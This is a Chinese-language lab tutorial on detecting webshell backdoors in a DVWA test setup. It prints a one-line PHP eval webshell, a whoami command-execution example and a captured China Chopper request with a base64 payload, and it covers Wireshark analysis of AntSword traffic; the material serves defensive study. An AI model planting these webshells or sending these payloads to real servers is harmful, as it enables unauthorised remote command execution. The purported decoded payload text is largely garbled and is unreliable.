- 代码层面后门分析
通过文件上传漏洞上传webshell
访问webshell地址: http://192.168.1.157/DVWA/DVWA/hackable/uploads/post.php
可以通过post传参来执行命令,a=system("whoami");
为什么可以通过post传参来执行系统命令呢? 分析一句话webshell的代码:
<?php @eval($_POST[a])?>
<?php ?>是php语言的格式,eval将括号内的字符串解析为php代码。 $_POST[test]为获取post参数test的值 @是抑制符号,屏蔽函数执行过程中遇到问题而产生的一些错误、警告信息,这样用户就看不到程序的 出错信息 该一句话木马的意思是:在post参数中test后面的值都会当作php的代码来执行 当我们传入system("whoami"),会当作php代码直接执行,system是php的命令执行函数,所以直接 执行了whoami命令,显示出来
2.菜刀后门分析
中国菜刀:一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都 可以用中国菜刀来进行管理。 Winsock expert:能够调试网络应用程序,分析网络程序的通信协议(如分析OICQ的发送接收数 据),并且在必要的时候能够修改和发送的数据。
打开菜刀链接webshell
打开WSExplorer
进入菜刀界面操作,WSExplorer会捕获到数据包
正常来说地址都是192.168.1.157,如果出现了可疑的其他服务器地址,就很有可能存在后门
分析数据包:
POST /DVWA/DVWA/hackable/uploads/post.php HTTP/1.1
X-Forwarded-For: 96.120.19.174
Referer: http://192.168.1.157
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 192.168.1.157
Content-Length: 659
Connection: Close
Cache-Control: no-cache
a=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHBocHN0dWR5X3Byb1xXV1dcRFZXQVxEVldBXGhhY2thYmxlXHVwbG9hZHNcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D
对z0的值进行base64解码得到明文:
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo(Ii0%ØÂ"³²GÖ&6ScEöFV6öFREõõ5E²'£%Ò²G3Ö&6ScEöFV6öFREõõ5E²'£"%Ò²FCÖF&æÖREõ4U%dU%²%45$EôdÄTäÔR%Ò²F3×7V'7G"FBÃÃÓÒ"ò#ò"Ö2Â'²G7ÕÂ"#¢"ö2Â'²G7ÕÂ"#²G#Ò'²GÒ²F7Ò#´77FVÒG"â"#âc"ÂG&WB·&çBG&WBÓò §&WCײG&WGТ#¢"#³¶V6ò'ÃÂÒ"¶FRs%3D&z1=cmd&z2=cd /d "C:\phpstudy_pro\WWW\DVWA\DVWA\hackable\uploads\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [EXQ%3D%3D
发现 z1=cmd z2=cd /d "C:\phpstudy_pro\WWW\DVWA\DVWA\hackable\uploads\"&netstat -an | find "ESTABLISHED" 该语句意思为进入C:\phpStudy\PHPTutorial\WWW\DVWA\hackable\uploads目录执行cmd命令 netstat -an | find "ESTABLISHED"查看处于established状态的接口,并且输出。这就是中国菜刀的流量通信的特征。
针对交互的流量包进行逐个分析,如果在这些特征中出现了可疑的IP地址或者服务器地址,就很有可能 存在后门
3.网络层面后门分析
打开Wireshark,选择VMware net8网卡,进行数据包捕获:
使用上传漏洞获取Webshell,并利用蚁剑继续连接,执行命令
通过语法过滤进行分析: ip.dst == 192.168.1.157 && http --> 查询目的IP是192.168.1.157并且协议是http的流量包
右击数据包,追踪TCP流,即可发现蚁剑执行命令的流量包
对其进行URL解码
对其进行分析,发现cmdrun和passthru等可能存在攻击威胁的特征